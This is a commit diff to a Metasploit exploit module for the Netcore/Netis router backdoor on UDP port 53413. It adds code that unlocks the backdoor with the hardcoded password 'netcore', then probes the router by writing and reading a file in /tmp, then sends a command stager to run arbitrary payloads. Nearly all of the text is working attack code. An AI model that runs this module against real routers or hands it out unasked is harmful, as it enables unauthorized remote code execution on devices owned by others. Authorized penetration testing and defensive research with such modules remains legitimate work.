For echo command

nixawk · nixawk · commit 864989cf6cef · 2016-07-26T20:27:23.000-05:00
diff --git a/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb b/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb
@@ -21,13 +21,21 @@ def initialize(info = {})
         the Netis brand name outside of China. This backdoor allows
         cybercriminals to easily run arbitrary code on these routers,
         rendering it vulnerable as a security device.
+        Some models include a non-standard echo command which doesn't
+        honor -e, and are therefore not currently exploitable with
+        Metasploit.  See URLs or module markdown for additional options.
       },
-      'Author'          => [ 'Nixawk' ],
+      'Author'          =>
+        [
+          'Nixawk',
+          'h00die <mike@shorebreaksecurity.com>'
+        ],
       'License'         => MSF_LICENSE,
       'References'      =>
         [
           [ 'URL', 'https://www.seebug.org/vuldb/ssvid-90227' ],
-          [ 'URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/' ]
+          [ 'URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/' ],
+          [ 'URL', 'https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py']
         ],
       'Privileged'      => true,
       'Targets'         =>
@@ -67,36 +75,48 @@ def send_command(data)
 
   def execute_command(cmd, _opts)
     send_command(cmd)
+    vprint_status("Sending: #{cmd}")
+  end
+
+  def authenticate()
+    # netcore is the password to unlock the backdoor
+    send_command('netcore')
+    resp = udp_sock.get(timeout)
+    if resp.include?('Login successed!')
+      vprint_good('Backdoor Unlocked')
+    end
   end
 
-  def vuln_version?
+  def check
     connect_udp
+    authenticate
     resp = []
-    ['netcore', '?'].each do |command|
+    tmp_file = Rex::Text.rand_text_alpha(5)
+    # we need to test the echo command to see if it plays nice
+    ["echo -en #{tmp_file} > /tmp/#{tmp_file}", "cat /tmp/#{tmp_file}"].each do |command|
       send_command(command)
       resp << udp_sock.get(timeout)
     end
     disconnect_udp
     resp_str = resp.join(',')
-    resp.length >= 1 && resp_str.include?("\x00\x00\x00\x05")
-  end
-
-  def check
-    if vuln_version?
-      Exploit::CheckCode::Vulnerable
+    # check if we got a good response back
+    if resp.length >= 1 && resp_str.include?("\x00\x00\x00\x05") && resp_str.include?(tmp_file)
+      # some routers have a non-standard echo which doesn't support -en, so we need to detect that
+      if resp_str.include?('en ')
+        print_status('Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.')
+        Exploit::CheckCode::Detected
+      else
+        Exploit::CheckCode::Vulnerable
+      end
     else
       Exploit::CheckCode::Safe
     end
   end
 
   def exploit
-    unless vuln_version?
-      print_status('Target is not vulnerable.')
-      return
-    end
-
     print_status('Exploiting...')
     connect_udp
+    authenticate
     execute_cmdstager(:flavor => :echo, :linemax => 200)
     disconnect_udp
   end
